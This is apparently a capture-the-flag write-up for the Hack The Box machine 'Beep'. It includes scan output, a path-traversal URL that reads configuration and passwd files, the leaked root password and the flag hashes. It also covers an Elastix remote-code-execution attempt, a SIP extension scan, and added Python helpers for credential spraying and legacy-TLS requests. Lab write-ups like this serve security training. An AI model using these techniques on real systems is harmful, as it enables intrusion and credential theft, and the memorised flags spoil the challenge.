Beep
IP: 10.10.10.7

nmap results
Open 10.10.10.7:22
Open 10.10.10.7:25
Open 10.10.10.7:80
Open 10.10.10.7:111
Open 10.10.10.7:110
Open 10.10.10.7:143
Open 10.10.10.7:443
Open 10.10.10.7:10000
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 adee5abb6937fb27afb83072a0f96f53 (DSA)
|_ 2048 bcc6735913a18a4b550750f6651d6d0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp open http Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp open pop3?
|_pop3-capabilities: USER IMPLEMENTATION(Cyrus POP3 server v2) AUTH-RESP-CODE RESP-CODES TOP UIDL PIPELINING APOP STLS LOGIN-DELAY(0) EXPIRE(NEVER)
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 882/udp status
|_ 100024 1 885/tcp status
143/tcp open imap?
|_imap-capabilities: NO Completed MULTIAPPEND UNSELECT STARTTLS ACL OK ID ANNOTATEMORE QUOTA LITERAL+ URLAUTHA0001 IDLE X-NETSCAPE THREAD=REFERENCES LISTEXT CONDSTORE CATENATE UIDPLUS LIST-SUBSCRIBED NAMESPACE IMAP4rev1 SORT=MODSEQ RENAME SORT RIGHTS=kxte BINARY ATOMIC CHILDREN THREAD=ORDEREDSUBJECT IMAP4 MAILBOX-REFERRALS
443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS))
|_ssl-date: 2023-07-28T17:25:29+00:00; +1s from scanner time.
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.2.3 (CentOS)
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after: 2018-04-07T08:22:08
|_http-title: Elastix - Login page
993/tcp open imaps?
|_imap-capabilities: CAPABILITY
995/tcp open pop3s?
3306/tcp open mysql?
4445/tcp open upnotifyp?
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts: beep.localdomain, 127.0.0.1

Elastix version: 0.5

Finding vuln:
searchsploit elastix

searchsploit lists several exploits for Elastix.

Solution 1 - LFI
searchsploit -m php/webapps/37637.pl
The exploit describes an endpoint vulnerable to LFI (local file inclusion). Using it to read /etc/amportal.conf, the FreePBX configuration file:
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf&module=Accounts&action
That file discloses several username/password pairs.

So I've got a bunch of usernames and passwords. Now what?
Before trying them, let's read /etc/passwd through the same LFI to see which users actually exist on the box; that narrows the attack surface.
The first thing to look for: does root have a login shell?
root:x:0:0:root:/root:/bin/bash
Then, how many other users have /bin/bash and a home directory under /home?
fanis:x:501:501::/home/fanis:/bin/bash
spamfilter:x:500:500::/home/spamfilter:/bin/bash
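Once amportal.conf and /etc/passwd have been pulled through the LFI, the triage above is mechanical. The script below is an added example, not code from the original writeup: it builds the graph.php LFI URL for any file, parses both files and lists the user/password pairs worth trying over SSH. The two sample files and every amportal.conf value in it are constructed (only the three passwd lines come from the writeup), and FreePBX's standard amportal.conf setting names (AMPDBPASS, AMPMGRPASS, FOPPASSWORD, ARI_ADMIN_*) are assumed as the credential keys.

```python
"""Credential triage for files pulled through the graph.php LFI.

Added example; this is not code from the original writeup. It covers the
offline half of the step above: build the LFI URL the writeup uses for any
target file, parse the disclosed amportal.conf for credential-looking
settings, parse /etc/passwd for users with a real login shell, and list the
(user, password) pairs worth trying over SSH. Both sample files below are
constructed for the example (the three passwd lines from the writeup plus
filler); the amportal.conf values are placeholders, not the box's secrets.
"""
import re
from urllib.parse import quote

LFI_BASE = "https://10.10.10.7/vtigercrm/graph.php"
TRAVERSAL = "../" * 8          # depth used by the writeup's URL

# Standard FreePBX amportal.conf credential settings end in these suffixes
# (AMPDBUSER/AMPDBPASS, AMPMGRUSER/AMPMGRPASS, FOPPASSWORD, ARI_ADMIN_*).
CRED_SUFFIX = re.compile(r"(USER|USERNAME|PASS|PASSWORD)$")

SAMPLE_AMPORTAL = """\
# constructed sample; values are placeholders
AMPDBHOST=localhost
AMPDBENGINE=mysql
AMPDBUSER=asteriskuser
AMPDBPASS=dbpass-example
AMPMGRUSER=admin
AMPMGRPASS=mgrpass-example   # trailing comment, stripped by the parser
FOPPASSWORD=foppass-example
ARI_ADMIN_USERNAME=admin
ARI_ADMIN_PASSWORD=aripass-example
AMPWEBROOT=/var/www/html
"""

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
asterisk:x:100:101:Asterisk PBX:/var/lib/asterisk:/bin/bash
spamfilter:x:500:500::/home/spamfilter:/bin/bash
fanis:x:501:501::/home/fanis:/bin/bash
"""


def lfi_url(path, base=LFI_BASE):
    """Return the graph.php URL that includes `path` via current_language.

    Produces exactly the writeup's traversal shape, e.g. for /etc/amportal.conf:
    ...?current_language=../../../../../../../..//etc/amportal.conf&module=Accounts&action
    """
    return "%s?current_language=%s/%s&module=Accounts&action" % (
        base, TRAVERSAL, quote(path.lstrip("/")))


def parse_amportal(text):
    """Parse KEY=value lines, dropping '#' comments and blank lines."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        settings[key] = value
    return settings


def credential_values(settings):
    """Keep only the settings whose names look like usernames or passwords."""
    return {k: v for k, v in settings.items() if CRED_SUFFIX.search(k)}


def shell_users(passwd):
    """Users that can log in interactively: a non-nologin shell and either
    uid 0 or a home directory under /home (the filter the writeup applies)."""
    users = []
    for line in passwd.splitlines():
        fields = line.strip().split(":")
        if len(fields) != 7:
            continue
        name, _, uid, _, _, home, shell = fields
        if shell.endswith(("nologin", "/false")):
            continue
        if uid == "0" or home.startswith("/home/"):
            users.append(name)
    return users


def candidates(users, creds):
    """Every (user, password) pair to try; passwords are de-duplicated."""
    passwords = sorted({v for k, v in creds.items() if "PASS" in k})
    return [(u, p) for u in users for p in passwords]


if __name__ == "__main__":
    print("LFI URL:", lfi_url("/etc/amportal.conf"))
    creds = credential_values(parse_amportal(SAMPLE_AMPORTAL))
    for user, password in candidates(shell_users(SAMPLE_PASSWD), creds):
        print("try: ssh %s@10.10.10.7  (password %s)" % (user, password))
```

The /home filter is a heuristic: service accounts such as asterisk or mysql keep /bin/bash on this kind of appliance but live outside /home, and they are exactly the accounts whose passwords are least likely to match a config-file secret, so they are dropped before spraying.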
I tried to SSH in from my Linux machine, but it showed an error: the SSH on the box is outdated and uses insecure algorithms, which is why my machine would not connect to it.

Solving this issue.
After a bit of research I found this solution.
Make a directory in your home dir:
mkdir -p ~/.ssh
Now create a config file in it:
nano ~/.ssh/config
and paste these things into it.
Alternatively, you can connect with PuTTY.
user: root
pass: jEhdIekWmdjE

And we are in as root.
root: f965360e0d402ce69bbb38566ddd2e8d
user: a290791a786a1bdcc8a59f81b4f3237a

Solution 2 - Remote Code Execution
The Exploit-DB copy of the exploit is too old, so I found a newer payload on GitHub.
Change LHOST to your tun0 address and LPORT to your listener port, then run the exploit.
But I'm getting an error.

So I made some changes.
The Python error "ModuleNotFoundError: No module named 'urllib2'" occurs because urllib2 was split into urllib.request and urllib.error in Python 3.
To fix it, import the function from its new location: from urllib.request import urlopen.
Modified payload:
Again another error.


The website only speaks the legacy TLSv1 protocol, and modern browsers and TLS libraries refuse to connect over such outdated protocol versions by default.
I tried to modify the script to bypass this SSL check, but had no luck.
I then found the approach Rana Khalil used: route the script's traffic through Burp and let Burp forward it to the target. Burp makes the outbound connection, so the legacy TLS handshake is done by Burp rather than by the Python library.
It also lets us see what is happening in the background by inspecting the traffic in Burp.
To do this, change the following in the script:
and change the following in Burp:


So our final payload looks like this:
Final
Now run it, with a listener started as well.
It runs without error this time, but we still don't get a shell.
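The three changes above (the urllib2 import, the TLS version problem and the Burp detour) all live in the script's HTTP layer. The following is an added example, not the GitHub payload the writeup used: a Python 3 opener that either negotiates TLSv1 directly or tunnels through Burp so that Burp handles the upstream handshake instead. The Burp listener address (127.0.0.1:8080) is an assumed default, and TARGET is only the site root from the writeup; the exploit path and command payload are deliberately not reproduced.

```python
"""Python 3 HTTP layer for the Elastix RCE script: legacy TLS, optional Burp.

Added example, not the GitHub payload the writeup used. It shows the three
changes the writeup works through in one place: the urllib2 -> urllib.request
import, an SSL context that still negotiates the target's TLSv1, and an
optional route through Burp so the request can be inspected. The Burp
listener address (127.0.0.1:8080) is an assumed default, and TARGET is only
the site root from the writeup; the exploit path and command payload are
deliberately not reproduced here.
"""
import ssl
from typing import Optional, Tuple
# Python 2 spelled these urllib2.Request, urllib2.build_opener, etc.
from urllib.request import HTTPSHandler, ProxyHandler, Request, build_opener

TARGET = "https://10.10.10.7/"         # from the writeup
BURP = "http://127.0.0.1:8080"         # assumed default Burp proxy listener


def legacy_tls_context() -> ssl.SSLContext:
    """Client context that accepts TLSv1 and an unverifiable certificate.

    A default context refuses TLS 1.0 and rejects the box's self-signed,
    expired localhost.localdomain certificate; either is enough to produce
    the handshake error the writeup hit. Both relaxations are acceptable only
    against a lab target you already intend to exploit.
    """
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    ctx.minimum_version = ssl.TLSVersion.TLSv1
    try:
        # OpenSSL >= 1.1 hides TLS 1.0/1.1 and their cipher suites behind the
        # security level; level 0 re-enables them. LibreSSL lacks @SECLEVEL.
        ctx.set_ciphers("DEFAULT:@SECLEVEL=0")
    except ssl.SSLError:
        pass
    return ctx


def make_opener(proxy: Optional[str] = None):
    """Opener with the legacy context; with `proxy` set, every request is
    tunnelled (CONNECT) through Burp, which then makes its own TLS connection
    to the target, so the legacy handshake is Burp's job, not Python's."""
    handlers = [HTTPSHandler(context=legacy_tls_context())]
    if proxy:
        handlers.append(ProxyHandler({"http": proxy, "https": proxy}))
    return build_opener(*handlers)


def proxy_map(opener) -> dict:
    """Return the proxy table the opener will use (empty if direct)."""
    for handler in opener.handlers:
        if isinstance(handler, ProxyHandler):
            return dict(handler.proxies)
    return {}


def send_get(url: str, proxy: Optional[str] = None,
             timeout: float = 10.0) -> Tuple[int, bytes]:
    """GET `url`, directly or via `proxy`; returns (status, body)."""
    request = Request(url, headers={"User-Agent": "Mozilla/5.0"})
    with make_opener(proxy).open(request, timeout=timeout) as response:
        return response.status, response.read()


if __name__ == "__main__":
    # Try the target directly first, then the same request through Burp.
    for proxy in (None, BURP):
        label = proxy or "direct"
        try:
            status, body = send_get(TARGET, proxy=proxy)
            print("%s: HTTP %d, %d bytes" % (label, status, len(body)))
        except OSError as exc:          # URLError and socket errors both land here
            print("%s: failed: %s" % (label, exc))
```

Two caveats: a direct TLSv1 connection only works if the local OpenSSL build still permits TLS 1.0 at security level 0, which is why the Burp route is the more reliable fallback; and whether Burp itself will negotiate TLSv1 with the target depends on Burp's own TLS settings, which is the change the writeup makes on the Burp side. Certificate verification is off in both paths because Burp presents its own generated certificate for the tunnelled connection.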

Let's check the request in Burp to see what's going on.

The call failed. Maybe we need to change the default extension. We don't know which extensions this PBX has, but there is a tool that can find valid extensions: SIPVicious, whose svwar tool identifies working extension lines on a PBX.
Installing SIPVicious:
pip install sipvicious
Now run the following command:
sudo sipvicious_svwar -m INVITE -e100-550 10.10.10.7
-m: the SIP request method, here INVITE.
-e: an extension or extension range, here 100-550. If nothing is found, widen the range. Note that INVITE scanning actually rings any extension it hits, so it is noisy; OPTIONS or REGISTER are quieter methods.

To be honest, I had to run the tool several times to get this result. 🙂
I was getting these errors.


OK, so the extension the app uses is 233.
Final payload
And here we go. Finally, we've got the initial shell.

When we visit the webpage, it isn't loading.

Modify the minimum TLS version in Firefox:
Open a new tab in Firefox. Enter "about:config" in the address bar and hit Enter/Return.
In the search box above the list, enter "security.tls.version.min".
Locate the preference "security.tls.version.min" and change its value to 1 (meaning TLS 1.0).
Q.2.
TLS version:
developer tools > network > security
TLSv1

Q.2
What is the name of the software that's hosting a webserver on 443?
The Elastix software version is disclosed.
Directory brute-forcing found a lang directory. Visiting that directory and opening any language file, e.g. cn.lang,
discloses the version.
